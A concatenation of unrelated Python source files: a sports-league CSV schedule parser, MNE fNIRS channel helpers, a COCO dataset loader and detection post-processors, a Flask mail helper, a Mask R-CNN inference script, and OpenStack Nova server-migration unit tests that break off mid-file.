except TeamDoesNotExist as e:
warnings.append(TEAM_NOT_FOUND.format(str(e), ",".join(game)))
return {"games": result, "warnings": warnings}
def extract_background(background):
"""Returns a dictionary of the extracted json objects from the background.
Parameters:
        background: dictionary with the league and division names
Returns:
        a dictionary with the league and division json objects
"""
background_keys = [key.lower() for key in background.keys()]
for value in BACKGROUND.values():
if value.lower() not in background_keys:
errorMessage = MISSING_BACKGROUND.format(value)
raise InvalidField(payload={"details": errorMessage})
# ensure able to find the division
division_name = background['division']
if division_name.lower().startswith("ex."):
error_message = LEFT_BACKGROUND_EXAMPLE.format(division_name)
raise InvalidField(payload={"details": error_message})
division = Division.query.filter(func.lower(Division.name) ==
func.lower(division_name)).first()
# ensure able to find the league
league_name = background['league']
if league_name.lower().startswith("ex."):
error_message = LEFT_BACKGROUND_EXAMPLE.format(league_name)
raise InvalidField(payload={"details": error_message})
league = League.query.filter(func.lower(League.name) ==
func.lower(league_name)).first()
if division is None:
error_message = INVALID_DIVISION.format(division_name)
raise DivisionDoesNotExist(payload={'details': error_message})
if league is None:
error_message = INVALID_LEAGUE.format(league_name)
raise LeagueDoesNotExist(payload={'details': error_message})
return {"league": league.json(), "division": division.json()}
def clean_cell(cell):
"""Returns a clean cell"""
return cell.strip().lower().replace(":", "")
def parse_parts(lines, delimiter=","):
"""Parses the lines and returns a dictionary with the three parts
Parameters:
lines: a list of lines
delimiter: the delimiter for the lines (default = ,)
Returns:
a dictionary with background, header, games, warnings where:
background: dictionary of league
header: the header row
games: a list of games lines
warnings: a list of lines that were not recognized
"""
background = {}
header = None
games = []
warnings = []
header_keywords = ([key.lower() for key in HEADERS.keys()] +
[value.lower() for value in HEADERS.values()])
background_keywords = ([key.lower() for key in BACKGROUND.keys()] +
[value.lower() for value in BACKGROUND.values()])
for line in lines:
info = line.split(delimiter)
if clean_cell(info[0]).lower() in background_keywords:
background[clean_cell(info[0])] = info[1].strip()
elif info[0].lower().strip() in header_keywords:
header = info
elif len(info) >= len(HEADERS.keys()):
games.append(info)
else:
warnings.append(INVALID_ROW.format(line))
return {'background': background,
'header': header,
'games': games,
'warnings': warnings}
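# A small illustration with hypothetical CSV rows (not part of the original
# module) showing how the helpers above split an import file into its parts.
if __name__ == "__main__":
    sample_lines = [
        "League:,Monday & Wednesday",
        "Division:,Competitive",
        "Home Team,Away Team,Date,Time,Field",
        "Sportzone Blue,Nightowls Black,2016-06-01,18:30,WP1",
    ]
    sample_parts = parse_parts(sample_lines)
    print(sample_parts["background"])
    # {'league': 'Monday & Wednesday', 'division': 'Competitive'}
    print(extract_column_indices_lookup(sample_parts["header"]))
    # {'home': 0, 'away': 1, 'date': 2, 'time': 3, 'field': 4}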
|
# Authors: Robert Luke <mail@robertluke.net>
# Eric Larson <larson.eric.d@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
#
# License: BSD-3-Clause
import re
import numpy as np
from ...io.pick import _picks_to_idx
from ...utils import fill_doc
# Standardized fNIRS channel name regexs
_S_D_F_RE = re.compile(r'S(\d+)_D(\d+) (\d+\.?\d*)')
_S_D_H_RE = re.compile(r'S(\d+)_D(\d+) (\w+)')
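# Illustration of the channel-name formats the regexes above parse
# (example channel names only):
#   _S_D_F_RE.match('S3_D1 760').groups() -> ('3', '1', '760')   # source, detector, wavelength
#   _S_D_H_RE.match('S3_D1 hbo').groups() -> ('3', '1', 'hbo')   # source, detector, chromophore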
@fill_doc
def source_detector_distances(info, picks=None):
r"""Determine the distance between NIRS source and detectors.
Parameters
----------
%(info_not_none)s
%(picks_all)s
Returns
-------
dists : array of float
Array containing distances in meters.
Of shape equal to number of channels, or shape of picks if supplied.
"""
dist = [np.linalg.norm(ch['loc'][3:6] - ch['loc'][6:9])
for ch in info['chs']]
picks = _picks_to_idx(info, picks, exclude=[])
return np.array(dist, float)[picks]
@fill_doc
def short_channels(info, threshold=0.01):
r"""Determine which NIRS channels are short.
Channels with a source to detector distance of less than
``threshold`` are reported as short. The default threshold is 0.01 m.
Parameters
----------
%(info_not_none)s
threshold : float
The threshold distance for what is considered short in meters.
Returns
-------
short : array of bool
Array indicating which channels are short.
Of shape equal to number of channels.
"""
return source_detector_distances(info) < threshold
def _channel_frequencies(info, nominal=False):
"""Return the light frequency for each channel."""
# Only valid for fNIRS data before conversion to haemoglobin
picks = _picks_to_idx(info, ['fnirs_cw_amplitude', 'fnirs_od'],
exclude=[], allow_empty=True)
freqs = np.empty(picks.size, int)
for ii in picks:
if nominal:
freq = float(_S_D_F_RE.match(info['ch_names'][ii]).groups()[2])
else:
freq = info['chs'][ii]['loc'][9]
freqs[ii] = freq
return freqs
def _channel_chromophore(info):
"""Return the chromophore of each channel."""
# Only valid for fNIRS data after conversion to haemoglobin
picks = _picks_to_idx(info, ['hbo', 'hbr'], exclude=[], allow_empty=True)
chroma = []
for ii in picks:
chroma.append(info['ch_names'][ii].split(" ")[1])
return chroma
def _check_channels_ordered(info, pair_vals):
"""Check channels follow expected fNIRS format."""
# Every second channel should be same SD pair
# and have the specified light frequencies.
# All wavelength based fNIRS data.
picks_wave = _picks_to_idx(info, ['fnirs_cw_amplitude', 'fnirs_od'],
exclude=[], allow_empty=True)
# All chromophore fNIRS data
picks_chroma = _picks_to_idx(info, ['hbo', 'hbr'],
exclude=[], allow_empty=True)
# All continuous wave fNIRS data
picks_cw = np.hstack([picks_chroma, picks_wave])
if (len(picks_wave) > 0) & (len(picks_chroma) > 0):
raise ValueError(
'MNE does not support a combination of amplitude, optical '
'density, and haemoglobin data in the same raw structure.')
if len(picks_cw) % 2 != 0:
raise ValueError(
'NIRS channels not ordered correctly. An even number of NIRS '
            f'channels is required. {len(info.ch_names)} channels were '
f'provided: {info.ch_names}')
# Ensure wavelength info exists for waveform data
all_freqs = [info["chs"][ii]["loc"][9] for ii in picks_wave]
if np.any(np.isnan(all_freqs)):
raise ValueError(
            'NIRS channels are missing wavelength information in the '
f'info["chs"] structure. The encoded wavelengths are {all_freqs}.')
for ii in picks_cw[::2]:
ch1_name_info = _S_D_F_RE.match(info['chs'][ii]['ch_name'])
ch2_name_info = _S_D_F_RE.match(info['chs'][ii + 1]['ch_name'])
if bool(ch2_name_info) & bool(ch1_name_info):
first_value = float(ch1_name_info.groups()[2])
second_value = float(ch2_name_info.groups()[2])
error_word = "frequencies"
else:
ch1_name_info = _S_D_H_RE.match(info['chs'][ii]['ch_name'])
ch2_name_info = _S_D_H_RE.match(info['chs'][ii + 1]['ch_name'])
if bool(ch2_name_info) & bool(ch1_name_info):
first_value = ch1_name_info.groups()[2]
second_value = ch2_name_info.groups()[2]
error_word = "chromophore"
if (first_value not in ["hbo", "hbr"] or
second_value not in ["hbo", "hbr"]):
raise ValueError(
"NIRS channels have specified naming conventions."
"Chromophore data must be labeled either hbo or hbr."
"Failing channels are "
f"{info['chs'][ii]['ch_name']}, "
f"{info['chs'][ii + 1]['ch_name']}")
else:
raise ValueError(
                    'NIRS channels have specified naming conventions. '
                    'The provided channel names cannot be parsed. '
f'Channels are {info.ch_names}')
if (ch1_name_info.groups()[0] != ch2_name_info.groups()[0]) or \
(ch1_name_info.groups()[1] != ch2_name_info.groups()[1]) or \
(first_value != pair_vals[0]) or \
(second_value != pair_vals[1]):
raise ValueError(
'NIRS channels not ordered correctly. Channels must be ordered'
' as source detector pairs with alternating'
f' {error_word}: {pair_vals[0]} & {pair_vals[1]}')
_fnirs_check_bads(info)
return picks_cw
def _validate_nirs_info(info):
"""Apply all checks to fNIRS info. Works on all continuous wave types."""
freqs = np.unique(_channel_frequencies(info, nominal=True))
if freqs.size > 0:
picks = _check_channels_ordered(info, freqs)
else:
picks = _check_channels_ordered(info,
np.unique(_channel_chromophore(info)))
return picks
def _fnirs_check_bads(info):
"""Check consistent labeling of bads across fnirs optodes."""
# For an optode pair, if one component (light frequency or chroma) is
# marked as bad then they all should be. This function checks that all
# optodes are marked bad consistently.
picks = _picks_to_idx(info, 'fnirs', exclude=[], allow_empty=True)
for ii in picks[::2]:
want = info.ch_names[ii:ii + 2]
got = list(set(info['bads']).intersection(want))
if len(got) == 1:
raise RuntimeError(
f'NIRS bad labelling is not consistent, found {got} but '
f'needed {want}')
def _fnirs_spread_bads(info):
"""Spread bad labeling across fnirs channels."""
# For an optode pair if any component (light frequency or chroma) is marked
# as bad, then they all should be. This function will find any pairs marked
# as bad and spread the bad marking to all components of the optode pair.
picks = _picks_to_idx(info, 'fnirs', exclude=[], allow_empty=True)
new_bads = list()
for ii in picks[::2]:
bad_opto = set(info['bads']).intersection(info.ch_names[ii:ii + 2])
if len(bad_opto) > 0:
new_bads.extend(info.ch_names[ii:ii + 2])
info['bads'] = new_bads
return info
|
# Copyright (c) 2019 Putt Sakdhnagool <putt.sakdhnagool@nectec.or.th>,
#
from __future__ import print_function
import re
first_cap_re = re.compile('(.)([A-Z][a-z]+)')
all_cap_re = re.compile('([a-z0-9])([A-Z])')
def to_snake_case(val):
s1 = first_cap_re.sub(r'\1_\2', val)
return all_cap_re.sub(r'\1_\2', s1).lower()
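# Example (illustrative inputs): the first regex splits before capitalized words,
# the second before remaining lowercase/uppercase boundaries, then lowercases.
if __name__ == "__main__":
    print(to_snake_case("CamelCaseValue"))  # camel_case_value
    print(to_snake_case("HTTPResponse"))    # http_response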
|
"""
implementation of coco dataset
"""
# pylint: disable=unused-argument,missing-docstring
import json
import logging
import os
import time
import cv2
import numpy as np
from pycocotools.cocoeval import COCOeval
import pycoco
import dataset
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("coco")
class Coco(dataset.Dataset):
def __init__(self, data_path, image_list, name, use_cache=0, image_size=None,
image_format="NHWC", pre_process=None, count=None, cache_dir=None,use_label_map=False):
super().__init__()
self.image_size = image_size
self.image_list = []
self.label_list = []
self.image_ids = []
self.image_sizes = []
self.count = count
self.use_cache = use_cache
self.data_path = data_path
self.pre_process = pre_process
self.use_label_map=use_label_map
if not cache_dir:
cache_dir = os.getcwd()
self.cache_dir = os.path.join(cache_dir, "preprocessed", name, image_format)
# input images are in HWC
self.need_transpose = True if image_format == "NCHW" else False
not_found = 0
empty_80catageories = 0
if image_list is None:
# by default look for val_map.txt
image_list = os.path.join(data_path, "annotations/instances_val2017.json")
self.annotation_file = image_list
if self.use_label_map:
# for pytorch
label_map = {}
with open(self.annotation_file) as fin:
annotations = json.load(fin)
for cnt, cat in enumerate(annotations["categories"]):
label_map[cat["id"]] = cnt + 1
os.makedirs(self.cache_dir, exist_ok=True)
start = time.time()
images = {}
with open(image_list, "r") as f:
coco = json.load(f)
for i in coco["images"]:
images[i["id"]] = {"file_name": i["file_name"],
"height": i["height"],
"width": i["width"],
"bbox": [],
"category": []}
for a in coco["annotations"]:
i = images.get(a["image_id"])
if i is None:
continue
                category_ids = label_map[a.get("category_id")] if self.use_label_map else a.get("category_id")
                i["category"].append(category_ids)
i["bbox"].append(a.get("bbox"))
for image_id, img in images.items():
image_name = os.path.join("val2017", img["file_name"])
src = os.path.join(data_path, image_name)
if not os.path.exists(src):
# if the image does not exists ignore it
not_found += 1
continue
if len(img["category"])==0 and self.use_label_map:
#if an image doesn't have any of the 81 categories in it
                empty_80catageories += 1  # should be 48 images - thus the validation set has 4952 images
continue
os.makedirs(os.path.dirname(os.path.join(self.cache_dir, image_name)), exist_ok=True)
dst = os.path.join(self.cache_dir, image_name)
if not os.path.exists(dst + ".npy"):
# cache a preprocessed version of the image
img_org = cv2.imread(src)
processed = self.pre_process(img_org, need_transpose=self.need_transpose, dims=self.image_size)
np.save(dst, processed)
self.image_ids.append(image_id)
self.image_list.append(image_name)
self.image_sizes.append((img["height"], img["width"]))
self.label_list.append((img["category"], img["bbox"]))
# limit the dataset if requested
if self.count and len(self.image_list) >= self.count:
break
time_taken = time.time() - start
if not self.image_list:
log.error("no images in image list found")
raise ValueError("no images in image list found")
if not_found > 0:
log.info("reduced image list, %d images not found", not_found)
if empty_80catageories > 0:
log.info("reduced image list, %d images without any of the 80 categories", empty_80catageories)
log.info("loaded {} images, cache={}, took={:.1f}sec".format(
len(self.image_list), use_cache, time_taken))
self.label_list = np.array(self.label_list)
def get_item(self, nr):
"""Get image by number in the list."""
dst = os.path.join(self.cache_dir, self.image_list[nr])
img = np.load(dst + ".npy")
return img, self.label_list[nr]
def get_item_loc(self, nr):
src = os.path.join(self.data_path, self.image_list[nr])
return src
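# A hedged usage sketch (the data path and the pre-processing callable below are
# hypothetical; the real benchmark harness supplies them):
#
#   ds = Coco(data_path="/data/coco",        # expects val2017/ and annotations/ inside
#             image_list=None,               # falls back to annotations/instances_val2017.json
#             name="coco-300",
#             image_size=[300, 300, 3],
#             pre_process=lambda img, need_transpose, dims: cv2.resize(img, (dims[0], dims[1])),
#             use_cache=0, count=8)
#   img, (categories, bboxes) = ds.get_item(0)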
class PostProcessCoco:
"""
Post processing for tensorflow ssd-mobilenet style models
"""
def __init__(self):
self.results = []
self.good = 0
self.total = 0
self.content_ids = []
self.use_inv_map = False
def add_results(self, results):
self.results.extend(results)
def __call__(self, results, ids, expected=None, result_dict=None, ):
# results come as:
# tensorflow, ssd-mobilenet: num_detections,detection_boxes,detection_scores,detection_classes
processed_results = []
# batch size
bs = len(results[0])
for idx in range(0, bs):
# keep the content_id from loadgen to handle content_id's without results
self.content_ids.append(ids[idx])
processed_results.append([])
detection_num = int(results[0][idx])
detection_boxes = results[1][idx]
detection_classes = results[3][idx]
expected_classes = expected[idx][0]
for detection in range(0, detection_num):
detection_class = int(detection_classes[detection])
if detection_class in expected_classes:
self.good += 1
box = detection_boxes[detection]
processed_results[idx].append([float(ids[idx]),
box[0], box[1], box[2], box[3],
results[2][idx][detection],
float(detection_class)])
self.total += 1
return processed_results
def start(self):
self.results = []
self.good = 0
self.total = 0
def finalize(self, result_dict, ds=None, output_dir=None):
result_dict["good"] += self.good
result_dict["total"] += self.total
if self.use_inv_map:
# for pytorch
label_map = {}
with open(ds.annotation_file) as fin:
annotations = json.load(fin)
for cnt, cat in enumerate(annotations["categories"]):
label_map[cat["id"]] = cnt + 1
inv_map = {v:k for k,v in label_map.items()}
detections = []
image_indices = []
for batch in range(0, len(self.results)):
image_indices.append(self.content_ids[batch])
for idx in range(0, len(self.results[batch])):
detection = self.results[batch][idx]
# this is the index of the coco image
image_idx = int(detection[0])
if image_idx != self.content_ids[batch]:
# working with the coco index/id is error prone - extra check to make sure it is consistent
log.error("image_idx missmatch, lg={} / result={}".format(image_idx, self.content_ids[batch]))
# map the index to the coco image id
detection[0] = ds.image_ids[image_idx]
height, width = ds.image_sizes[image_idx]
# box comes from model as: ymin, xmin, ymax, xmax
ymin = detection[1] * height
xmin = detection[2] * width
ymax = detection[3] * height
xmax = detection[4] * width
# pycoco wants {imageID,x1,y1,w,h,score,class}
detection[1] = xmin
detection[2] = ymin
detection[3] = xmax - xmin
detection[4] = ymax - ymin
if self.use_inv_map:
cat_id = inv_map.get(int(detection[6]), -1)
if cat_id == -1:
# FIXME:
log.info("finalize can't map category {}".format(int(detection[6])))
detection[6] = cat_id
detections.append(np.array(detection))
# map indices to coco image id's
image_ids = [ds.image_ids[i] for i in image_indices]
self.results = []
cocoGt = pycoco.COCO(ds.annotation_file)
cocoDt = cocoGt.loadRes(np.array(detections))
cocoEval = COCOeval(cocoGt, cocoDt, iouType='bbox')
cocoEval.params.imgIds = image_ids
cocoEval.evaluate()
cocoEval.accumulate()
cocoEval.summarize()
result_dict["mAP"] = cocoEval.stats[0]
class PostProcessCocoPt(PostProcessCoco):
"""
Post processing required by ssd-resnet34 / pytorch
"""
def __init__(self,use_inv_map,score_threshold):
super().__init__()
self.use_inv_map = use_inv_map
self.score_threshold = score_threshold
def __call__(self, results, ids, expected=None, result_dict=None):
# results come as:
# detection_boxes,detection_classes,detection_scores
processed_results = []
# batch size
bs = len(results[0])
for idx in range(0, bs):
self.content_ids.append(ids[idx])
processed_results.append([])
detection_boxes = results[0][idx]
detection_classes = results[1][idx]
expected_classes = expected[idx][0]
scores = results[2][idx]
#for detection in range(0, len(expected_classes)):
for detection in range(0, len(scores)):
if scores[detection] < self.score_threshold:
break
detection_class = int(detection_classes[detection])
if detection_class in expected_classes:
self.good += 1
box = detection_boxes[detection]
# comes from model as: 0=xmax 1=ymax 2=xmin 3=ymin
processed_results[idx].append([float(ids[idx]),
box[1], box[0], box[3], box[2],
scores[detection],
float(detection_class)])
self.total += 1
return processed_results
class PostProcessCocoOnnx(PostProcessCoco):
"""
Post processing required by ssd-resnet34 / onnx
"""
def __init__(self):
super().__init__()
def __call__(self, results, ids, expected=None, result_dict=None):
# results come as:
# onnx (from pytorch ssd-resnet34): detection_boxes,detection_classes,detection_scores
processed_results = []
# batch size
bs = len(results[0])
for idx in range(0, bs):
self.content_ids.append(ids[idx])
processed_results.append([])
detection_boxes = results[0][idx]
detection_classes = results[1][idx]
expected_classes = expected[idx][0]
scores = results[2][idx]
for detection in range(0, len(scores)):
if scores[detection] < 0.5:
break
detection_class = int(detection_classes[detection])
if detection_class in expected_classes:
self.good += 1
box = detection_boxes[detection]
# comes from model as: 0=xmax 1=ymax 2=xmin 3=ymin
processed_results[idx].append([float(ids[idx]),
box[1], box[0], box[3], box[2],
scores[detection],
float(detection_class)])
self.total += 1
return processed_results
class PostProcessCocoTf(PostProcessCoco):
"""
    Post processing required by ssd-resnet34 / tensorflow
"""
def __init__(self):
super().__init__()
self.use_inv_map = True
def __call__(self, results, ids, expected=None, result_dict=None):
# results come as:
# detection_boxes,detection_classes,detection_scores
processed_results = []
# batch size
bs = len(results[0])
for idx in range(0, bs):
self.content_ids.append(ids[idx])
processed_results.append([])
detection_boxes = results[0][idx]
detection_classes = results[1][idx]
expected_classes = expected[idx][0]
scores = results[2][idx]
for detection in range(0, len(scores)):
if scores[detection] < 0.05:
break
detection_class = int(detection_classes[detection])
if detection_class in expected_classes:
self.good += 1
box = detection_boxes[detection]
# comes from model as: 0=xmax 1=ymax 2=xmin 3=ymin
processed_results[idx].append([float(ids[idx]),
box[0], box[1], box[2], box[3],
scores[detection],
float(detection_class)])
self.total += 1
return processed_results
class PostProcessCocoResnext(PostProcessCoco):
"""
Post processing required by ssd-resnext50 / pytorch & onnx
"""
def __init__(self, use_inv_map, score_threshold, height, width, dict_format=True):
"""
Args:
height (int): Height of the input image
width (int): Width of the input image
dict_format (bool): True if the model outputs a dictionary.
False otherwise. Defaults to True.
"""
super().__init__()
self.use_inv_map = use_inv_map
self.score_threshold = score_threshold
self.height = height
self.width = width
self.dict_format = dict_format
def __call__(self, results, ids, expected=None, result_dict=None):
if self.dict_format:
# If the output of the model is in dictionary format. This happens
# for the model ssd-resnext50-pytorch
bboxes_ = [e['boxes'] for e in results]
labels_ = [e['labels'] for e in results]
scores_ = [e['scores'] for e in results]
results = [bboxes_, labels_, scores_]
else:
bboxes_ = [results[0]]
labels_ = [results[1]]
scores_ = [results[2]]
results = [bboxes_, labels_, scores_]
processed_results = []
content_ids = []
# batch size
bs = len(results[0])
for idx in range(0, bs):
content_ids.append(ids[idx])
processed_results.append([])
detection_boxes = results[0][idx]
detection_classes = results[1][idx]
expected_classes = expected[idx][0]
scores = results[2][idx]
for detection in range(0, len(scores)):
if scores[detection] < self.score_threshold:
break
detection_class = int(detection_classes[detection])
if detection_class in expected_classes:
self.good += 1
box = detection_boxes[detection]
# box comes from model as: xmin, ymin, xmax, ymax
                # box comes with dimensions in the range of [0, height]
                # and [0, width] respectively. It is necessary to scale
# them in the range [0, 1]
processed_results[idx].append(
[
float(ids[idx]),
box[1] / self.height,
box[0] / self.width,
box[3] / self.height,
box[2] / self.width,
scores[detection],
float(detection_class),
]
)
self.total += 1
self.content_ids.extend(content_ids)
return processed_results
|
from django.test.testcases import TestCase
class ProcessBlockchainTest(TestCase):
pass
|
from flask_mail import Message
from flask import render_template
from . import mail
def mail_message(subject,template,to,**kwargs):
sender_email = 'shaggyneils@gmail.com'
email = Message(subject, sender=sender_email, recipients=[to])
email.body= render_template(template + ".txt",**kwargs)
email.html = render_template(template + ".html",**kwargs)
mail.send(email)
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
# Set up custom environment before nearly anything else is imported
# NOTE: this should be the first import (do not reorder)
from maskrcnn_benchmark.utils.env import setup_environment # noqa F401 isort:skip
import argparse
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '3'
import torch
from maskrcnn_benchmark.config import cfg
from maskrcnn_benchmark.data import make_data_loader
from maskrcnn_benchmark.engine.inference import inference
from maskrcnn_benchmark.modeling.detector import build_detection_model
from maskrcnn_benchmark.utils.checkpoint import DetectronCheckpointer
from maskrcnn_benchmark.utils.collect_env import collect_env_info
from maskrcnn_benchmark.utils.comm import synchronize, get_rank
from maskrcnn_benchmark.utils.logger import setup_logger
from maskrcnn_benchmark.utils.miscellaneous import mkdir
def main():
parser = argparse.ArgumentParser(description="PyTorch Object Detection Inference")
parser.add_argument(
"--config-file",
default="../configs/caffe2/e2e_mask_rcnn_R_50_FPN_1x_caffe2.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument("--local_rank", type=int, default=0)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
num_gpus = int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1
distributed = num_gpus > 1
if distributed:
torch.cuda.set_device(args.local_rank)
torch.distributed.init_process_group(
backend="nccl", init_method="env://"
)
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
save_dir = ""
logger = setup_logger("maskrcnn_benchmark", save_dir, get_rank())
logger.info("Using {} GPUs".format(num_gpus))
logger.info(cfg)
logger.info("Collecting env info (might take some time)")
logger.info("\n" + collect_env_info())
model = build_detection_model(cfg)
model.to(cfg.MODEL.DEVICE)
output_dir = cfg.OUTPUT_DIR
checkpointer = DetectronCheckpointer(cfg, model, save_dir=output_dir)
_ = checkpointer.load(cfg.MODEL.WEIGHT)
iou_types = ("bbox",)
if cfg.MODEL.MASK_ON:
iou_types = iou_types + ("segm",)
output_folders = [None] * len(cfg.DATASETS.TEST)
dataset_names = cfg.DATASETS.TEST
if cfg.OUTPUT_DIR:
for idx, dataset_name in enumerate(dataset_names):
output_folder = os.path.join(cfg.OUTPUT_DIR, "inference", dataset_name)
mkdir(output_folder)
output_folders[idx] = output_folder
data_loaders_val = make_data_loader(cfg, is_train=False, is_distributed=distributed)
for output_folder, dataset_name, data_loader_val in zip(output_folders, dataset_names, data_loaders_val):
inference(
model,
data_loader_val,
dataset_name=dataset_name,
iou_types=iou_types,
box_only=cfg.MODEL.RPN_ONLY,
device=cfg.MODEL.DEVICE,
expected_results=cfg.TEST.EXPECTED_RESULTS,
expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,
output_folder=output_folder,
)
synchronize()
if __name__ == "__main__":
main()
|
# Copyright 2016 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import datetime
import mock
from oslo_utils.fixture import uuidsentinel as uuids
import six
import webob
from nova.api.openstack.compute import server_migrations
from nova import exception
from nova import objects
from nova.objects import base
from nova import test
from nova.tests.unit.api.openstack import fakes
SERVER_UUID = uuids.server_uuid
fake_migrations = [
{
'id': 1234,
'source_node': 'node1',
'dest_node': 'node2',
'source_compute': 'compute1',
'dest_compute': 'compute2',
'dest_host': '1.2.3.4',
'status': 'running',
'instance_uuid': SERVER_UUID,
'old_instance_type_id': 1,
'new_instance_type_id': 2,
'migration_type': 'live-migration',
'hidden': False,
'memory_total': 123456,
'memory_processed': 12345,
'memory_remaining': 111111,
'disk_total': 234567,
'disk_processed': 23456,
'disk_remaining': 211111,
'created_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'deleted_at': None,
'deleted': False,
'uuid': uuids.migration1,
'cross_cell_move': False,
},
{
'id': 5678,
'source_node': 'node10',
'dest_node': 'node20',
'source_compute': 'compute10',
'dest_compute': 'compute20',
'dest_host': '5.6.7.8',
'status': 'running',
'instance_uuid': SERVER_UUID,
'old_instance_type_id': 5,
'new_instance_type_id': 6,
'migration_type': 'live-migration',
'hidden': False,
'memory_total': 456789,
'memory_processed': 56789,
'memory_remaining': 400000,
'disk_total': 96789,
'disk_processed': 6789,
'disk_remaining': 90000,
'created_at': datetime.datetime(2013, 10, 22, 13, 42, 2),
'updated_at': datetime.datetime(2013, 10, 22, 13, 42, 2),
'deleted_at': None,
'deleted': False,
'uuid': uuids.migration2,
'cross_cell_move': False,
}
]
migrations_obj = base.obj_make_list(
'fake-context',
objects.MigrationList(),
objects.Migration,
fake_migrations)
class ServerMigrationsTestsV21(test.NoDBTestCase):
wsgi_api_version = '2.22'
def setUp(self):
super(ServerMigrationsTestsV21, self).setUp()
self.req = fakes.HTTPRequest.blank('', version=self.wsgi_api_version)
self.context = self.req.environ['nova.context']
self.controller = server_migrations.ServerMigrationsController()
self.compute_api = self.controller.compute_api
def test_force_complete_succeeded(self):
@mock.patch.object(self.compute_api, 'live_migrate_force_complete')
@mock.patch.object(self.compute_api, 'get')
def _do_test(compute_api_get, live_migrate_force_complete):
self.controller._force_complete(self.req, '1', '1',
body={'force_complete': None})
live_migrate_force_complete.assert_called_once_with(
self.context, compute_api_get.return_value, '1')
_do_test()
def _test_force_complete_failed_with_exception(self, fake_exc,
expected_exc):
@mock.patch.object(self.compute_api, 'live_migrate_force_complete',
side_effect=fake_exc)
@mock.patch.object(self.compute_api, 'get')
def _do_test(compute_api_get, live_migrate_force_complete):
self.assertRaises(expected_exc,
self.controller._force_complete,
self.req, '1', '1',
body={'force_complete': None})
_do_test()
def test_force_complete_instance_not_migrating(self):
self._test_force_complete_failed_with_exception(
exception.InstanceInvalidState(instance_uuid='', state='',
attr='', method=''),
webob.exc.HTTPConflict)
def test_force_complete_migration_not_found(self):
self._test_force_complete_failed_with_exception(
exception.MigrationNotFoundByStatus(instance_id='', status=''),
webob.exc.HTTPBadRequest)
def test_force_complete_instance_is_locked(self):
self._test_force_complete_failed_with_exception(
exception.InstanceIsLocked(instance_uuid=''),
webob.exc.HTTPConflict)
def test_force_complete_invalid_migration_state(self):
self._test_force_complete_failed_with_exception(
exception.InvalidMigrationState(migration_id='', instance_uuid='',
state='', method=''),
webob.exc.HTTPBadRequest)
def test_force_complete_instance_not_found(self):
self._test_force_complete_failed_with_exception(
exception.InstanceNotFound(instance_id=''),
webob.exc.HTTPNotFound)
def test_force_complete_unexpected_error(self):
self._test_force_complete_failed_with_exception(
exception.NovaException(),
webob.exc.HTTPInternalServerError)
class ServerMigrationsTestsV223(ServerMigrationsTestsV21):
wsgi_api_version = '2.23'
def setUp(self):
super(ServerMigrationsTestsV223, self).setUp()
self.req = fakes.HTTPRequest.blank('', version=self.wsgi_api_version,
use_admin_context=True)
self.context = self.req.environ['nova.context']
@mock.patch('nova.compute.api.API.get_migrations_in_progress_by_instance')
@mock.patch('nova.compute.api.API.get')
def test_index(self, m_get_instance, m_get_mig):
migrations = [server_migrations.output(mig) for mig in migrations_obj]
migrations_in_progress = {'migrations': migrations}
for mig in migrations_in_progress['migrations']:
self.assertIn('id', mig)
self.assertNotIn('deleted', mig)
self.assertNotIn('deleted_at', mig)
m_get_mig.return_value = migrations_obj
response = self.controller.index(self.req, SERVER_UUID)
self.assertEqual(migrations_in_progress, response)
m_get_instance.assert_called_once_with(self.context, SERVER_UUID,
expected_attrs=None,
cell_down_support=False)
@mock.patch('nova.compute.api.API.get')
def test_index_invalid_instance(self, m_get_instance):
m_get_instance.side_effect = exception.InstanceNotFound(instance_id=1)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.index,
self.req, SERVER_UUID)
m_get_instance.assert_called_once_with(self.context, SERVER_UUID,
expected_attrs=None,
cell_down_support=False)
@mock.patch('nova.compute.api.API.get_migration_by_id_and_instance')
@mock.patch('nova.compute.api.API.get')
def test_show(self, m_get_instance, m_get_mig):
migrations = [server_migrations.output(mig) for mig in migrations_obj]
m_get_mig.return_value = migrations_obj[0]
response = self.controller.show(self.req, SERVER_UUID,
migrations_obj[0].id)
self.assertEqual(migrations[0], response['migration'])
m_get_instance.assert_called_once_with(self.context, SERVER_UUID,
expected_attrs=None,
cell_down_support=False)
@mock.patch('nova.compute.api.API.get_migration_by_id_and_instance')
@mock.patch('nova.compute.api.API.get')
def test_show_migration_non_progress(self, m_get_instance, m_get_mig):
non_progress_mig = copy.deepcopy(migrations_obj[0])
non_progress_mig.status = "reverted"
m_get_mig.return_value = non_progress_mig
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show,
self.req, SERVER_UUID,
non_progress_mig.id)
m_get_instance.assert_called_once_with(self.context, SERVER_UUID,
expected_attrs=None,
cell_down_support=False)
@mock.patch('nova.compute.api.API.get_migration_by_id_and_instance')
@mock.patch('nova.compute.api.API.get')
def test_show_migration_not_live_migration(self, m_get_instance,
m_get_mig):
non_progress_mig = copy.deepcopy(migrations_obj[0])
non_progress_mig.migration_type = "resize"
m_get_mig.return_value = non_progress_mig
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show,
self.req, SERVER_UUID,
non_progress_mig.id)
m_get_instance.assert_called_once_with(self.context, SERVER_UUID,
expected_attrs=None,
cell_down_support=False)
@mock.patch('nova.compute.api.API.get_migration_by_id_and_instance')
@mock.patch('nova.compute.api.API.get')
